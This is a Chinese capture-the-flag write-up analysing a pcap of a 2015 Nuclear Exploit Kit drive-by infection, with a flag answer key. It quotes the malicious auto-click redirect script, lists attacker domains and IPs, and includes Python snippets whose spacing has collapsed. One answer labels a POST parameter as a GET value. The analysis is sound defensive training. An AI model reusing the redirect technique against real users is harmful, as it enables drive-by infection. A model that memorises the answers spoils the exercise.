玄机靶场-2015-01-09-Traffic analysis exercise WP
玄机靶场-2015-01-09-Traffic analysis exercise WP
这道题是一道纯流量分析题,考的是 Nuclear Exploit Kit 的完整感染链分析。没有靶机环境,直接给了一个 pcap 文件,用 Python/dpkt 重组 TCP 流来回答 8 个问题。整体难度中等,关键在于理解 EK 的攻击流程,以及知道 Wireshark 的 tcp.stream 编号规则。
1. 确认活动时间(UTC)
打开 pcap 后看第一个数据包的时间戳,直接就是答案。用 dpkt 读取:
withopen('traffic.pcap','rb')asf:pcap=dpkt.pcap.Reader(f)forts,bufinpcap:print(datetime.datetime.utcfromtimestamp(ts))break第一个包时间戳对应 UTC 时间 2015-01-05 16:24:40。注意题目文件名是 2015-01-09,但实际流量日期是 1 月 5 日,别被文件名带偏。
Flag 1:2015-01-05 16:24:40
2. 受害 Windows 主机的 IP 和 MAC 地址
流量里只有一个内网 IP:192.168.204.137,其余都是外网服务器。MAC 地址从以太网帧头提取:
eth=dpkt.ethernet.Ethernet(buf)src_mac=':'.join('%02x'%bforbineth.src)# -> 00:0c:29:9d:b8:6d00:0c:29开头是 VMware 的 OUI,说明这是一台 VMware 虚拟机,典型的分析环境。
Flag 2:192.168.204.137,00:0c:29:9d:b8:6d
3. 受感染网站的 IP 和域名
整个感染链的入口是受害者通过 Google 搜索结果点进去的一个匈牙利网站。从 tcp.stream 0 的 HTTP 请求可以看到:
GET http://www.opushangszer.hu/ HTTP/1.1 Referer: http://www.google.si/url?url=http://www.opushangszer.hu/...这个网站的 IP 是94.199.178.119,它的页面里嵌入了恶意 SWF,触发了后续的 EK 感染链。这是典型的 Drive-by Download 场景,合法网站被植入了恶意代码。
Flag 3:94.199.178.119,www.opushangszer.hu
4. 漏洞利用工具包(EK)的 IP 和域名
这套 EK 是 Nuclear Exploit Kit,C2 域名是static.domainvertythephones.com,解析到167.160.46.121。从 tcp.stream 3、4、5 可以看到所有与 EK 的通信都指向这个 IP。
域名用了static.前缀伪装成静态资源服务器,是 EK 的常见混淆手段。
Flag 4:167.160.46.121,static.domainvertythephones.com
5. 受害主机使用的浏览器
从所有 HTTP 请求的 User-Agent 字段可以看到:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)这是 Internet Explorer 8,运行在 Windows 7(NT 6.1)上。IE 8 是 2015 年初仍然常见的老版本浏览器,对各种 EK 的漏洞利用几乎没有防御能力。
Flag 5:Internet Explorer 8
6. 返回 EK 重定向的 HTTP 请求参数值
感染链的中间跳板是akronkappas.com。受感染网站opushangszer.hu里的恶意 SWF(d6bc1dc7da4ed54a62b93b5d0f1cc40c.swf)在 Flash 执行后,向akronkappas.com发了一个 POST 请求:
POST /d2a42e1f7d9a1021bd7d93af414c95c4.php?q=70a9b40eb73da11445c3a3609c8241d9 HTTP/1.1 Host: akronkappas.com Referer: http://imprintchurch.org/d6bc1dc7da4ed54a62b93b5d0f1cc40c.swf服务器响应返回了一段 HTML,里面用 JavaScript 自动点击一个链接跳转到 EK:
<aid='myLink'href='http://static.domainvertythephones.com/3h251q2c35'>click</a><script>document.getElementById('myLink').click();</script>题目问的是 GET 请求里唯一的参数值,即q参数的值。
Flag 6:70a9b40eb73da11445c3a3609c8241d9
7. 包含恶意软件负载的 tcp.stream
整个流量里共有 6 个 TCP 流(tcp.stream 0~5):
| tcp.stream | 连接 | 内容 |
|---|---|---|
| 0 | → 94.199.178.119:80 | 受感染网站页面 |
| 1 | → 75.126.113.164:80 | 恶意 SWF 文件(942 bytes) |
| 2 | → 69.65.9.55:80 | Flash POST 请求 + EK 跳转响应 |
| 3 | → 167.160.46.121:80 | EK Landing Page(gzip 压缩 HTML) |
| 4 | → 167.160.46.121:80 | 恶意软件负载(242,285 bytes,application/octet-stream) |
| 5 | → 167.160.46.121:80 | EK 后续 HTML 响应 |
tcp.stream 4 是关键:服务器返回了一个 242,285 bytes 的application/octet-stream文件,这是经过 XOR 加密的 PE 可执行文件(恶意软件负载)。Nuclear EK 惯用 XOR 加密 payload 来绕过 IDS 检测。
在 Wireshark 里用过滤器tcp.stream eq 4可以隔离出这条流。
Flag 7:tcp.stream eq 4
8. Flash 播放器版本
Flash 版本信息隐藏在 HTTP 请求头里。在 tcp.stream 1(请求恶意 SWF)和 tcp.stream 3(访问 EK Landing Page)的请求头中都有:
flash-version: 11,8,800,94这是 Flash Player 11.8.800.94,是 2013 年的版本,存在多个已知漏洞,正是 Nuclear EK 利用的目标。
Flag 8:11.8.800.94
总结
这道题还原了一条完整的 Nuclear EK 感染链:用户通过 Google 点进被植入恶意代码的匈牙利网站 → 触发恶意 SWF → Flash 向跳板服务器 POST 请求 → 跳板返回 EK 链接 → EK Landing Page 检测环境 → 下载 XOR 加密的恶意软件 payload。整个过程不到 2 分钟,受害者全程无感知。
Flag 汇总:
| 步骤 | 问题 | 答案 |
|---|---|---|
| 1 | 活动时间(UTC) | 2015-01-05 16:24:40 |
| 2 | 受害主机 IP 和 MAC | 192.168.204.137,00:0c:29:9d:b8:6d |
| 3 | 受感染网站 IP 和域名 | 94.199.178.119,www.opushangszer.hu |
| 4 | EK IP 和域名 | 167.160.46.121,static.domainvertythephones.com |
| 5 | 浏览器 | Internet Explorer 8 |
| 6 | GET 参数值 | 70a9b40eb73da11445c3a3609c8241d9 |
| 7 | 恶意软件负载所在流 | tcp.stream eq 4 |
| 8 | Flash 版本 | 11.8.800.94 |